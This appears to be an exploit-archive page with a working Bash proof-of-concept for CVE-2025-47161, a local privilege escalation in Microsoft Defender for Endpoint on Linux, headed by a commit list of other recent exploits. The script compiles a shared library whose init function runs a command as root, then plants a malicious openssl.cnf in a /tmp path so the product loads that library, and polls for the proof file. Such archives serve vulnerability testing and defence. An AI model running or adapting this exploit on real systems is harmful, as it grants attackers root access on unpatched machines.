1c08d6e575
9 changes to exploits/shellcodes/ghdb Sudo 1.9.17 Host Option - Elevation of Privilege Sudo chroot 1.9.17 - Local Privilege Escalation Microsoft Defender for Endpoint (MDE) - Elevation of Privilege ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) Discourse 3.2.x - Anonymous Cache Poisoning Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover Microsoft Outlook - Remote Code Execution (RCE) Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
78 lines
No EOL
2 KiB
Bash
78 lines
No EOL
2 KiB
Bash
#!/bin/bash
|
|
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
|
|
# Date: 2025-05-27
|
|
# Exploit Author: Rich Mirch
|
|
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
|
|
# Software Link:
|
|
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
|
|
# Versions:
|
|
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
|
|
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
|
|
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
|
|
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
|
|
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
|
|
#
|
|
# Vendor Advisory:
|
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
|
|
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
|
|
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
|
|
# CVE : CVE-2025-47161
|
|
#
|
|
echo "MDE Version: $(mdatp version)"
|
|
|
|
# stage
|
|
cat >mde-exp.c<<EOF
|
|
/*
|
|
* Build procedure:
|
|
* gcc -fPIC -o woot.o -Wall -c woot.c
|
|
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
|
|
*/
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/stat.h>
|
|
|
|
void woot(){
|
|
// for manual testing
|
|
if(isatty(STDERR_FILENO)) {
|
|
fprintf(stderr,"Woot!\n");
|
|
}
|
|
system("ps -ef > /woot.txt");
|
|
sleep(3000000);
|
|
}
|
|
|
|
EOF
|
|
|
|
# build exploit
|
|
gcc -fPIC -o woot.o -Wall -c mde-exp.c
|
|
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
|
|
|
|
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
|
|
|
|
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
|
|
<<EOF
|
|
# Malicious openssl.cnf
|
|
openssl_conf = openssl_init
|
|
[openssl_init]
|
|
engines = engine_section
|
|
|
|
[engine_section]
|
|
woot = woot_section
|
|
|
|
[woot_section]
|
|
engine_id = woot
|
|
dynamic_path = /tmp/woot.so
|
|
init = 0
|
|
EOF
|
|
|
|
echo "Checking every 15 seconds for /woot.txt"
|
|
while true
|
|
do
|
|
if [[ -f /woot.txt ]]
|
|
then
|
|
echo "WOOT - /woot.txt exists"
|
|
ls -ld /woot.txt
|
|
exit
|
|
fi
|
|
sleep 15
|
|
done |